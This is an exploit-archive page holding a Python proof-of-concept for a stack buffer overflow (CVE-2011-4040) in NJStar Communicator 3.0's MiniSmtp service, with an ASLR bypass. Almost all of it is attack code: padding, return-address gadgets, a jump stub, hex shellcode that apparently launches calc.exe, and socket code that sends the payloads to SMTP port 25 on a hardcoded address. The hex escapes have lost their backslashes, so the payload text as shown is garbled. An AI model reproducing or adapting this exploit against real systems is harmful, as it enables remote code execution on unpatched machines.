[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : NJStar Communicator MiniSmtp Buffer Overflow [ASLR Bypass]
# Published : 2011-12-03
# Author :
# Previous Title : IRAI AUTOMGEN <= 8.0.0.7 Use After Free
# Next Title : FreeBSD UIPC socket heap overflow proof-of-concept
# Exploit Title: NJStart Communicator MiniSmtp Buffer Overflow [ASLR Bypass]
# Date: 02/12/11
# Author: Zune - Julian Pulido
# Software Link: http://www.njstar.com/download/njcom.exe
# Version: 3.0
# Build: 11818 and previous
# Tested on: Windows 7 Ultimate
# CVE:2011-4040
#! /usr/local/bin/python
import socket
import time
carriage= chr(0xd)
#######################################
Padding1= chr(0x31)* 275
Jump= 'x8dx44x24x80xffxe0x90x90'
Junk1= chr(0x90)* 4
return1= 'x2dx12x41' # pop retn
egg1= Padding1+Jump+Junk1+return1+carriage
#######################################
Padding2= chr(0x32)* 271
return2= 'x2bx12x41' # pop pop pop retn
egg2= Padding2+return2+carriage
#######################################
Padding3= chr(0x33) * 263
return3= 'x2dx12x41' # pop retn
egg3= Padding3+return3+carriage
#######################################
Padding4= chr(0x34) * 171
Padding5= chr(0x34) * 22
ShellCode = "xC7x43x20x63x61x6Cx63xC7x43x24x2Ex65x78x65x33xC0
x66xB8x1Ax08xC1xE0x08xB0x79x03xE8x8Dx43x20x33xC9xB1x01xC1
xC1x0Cx2BxE1x6Ax05x50xFFxD5x8Dx85x85x44xF8xFFx6Ax01xFFxD0"
return4= 'x2bx12x41' # pop pop pop retn
egg4= Padding4+ShellCode+Padding5+return4+carriage
#######################################
def Send_SMTP (egg):
connectionx.send(egg +'n')
time.sleep(2)
connectionx = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Exploit NJStar Communicator 3.0 MiniSmtp by Zunen"
print "Windows 7 Ultimate [ASLR Bypass]"
try:
connectionx.connect(("192.168.1.65",25))#SMTP port 25
Send_SMTP(egg1)
Send_SMTP(egg2)
Send_SMTP(egg3)
Send_SMTP(egg4)
connectionx.close()
except socket.error:
print "it couldn't connect"
time.sleep(2)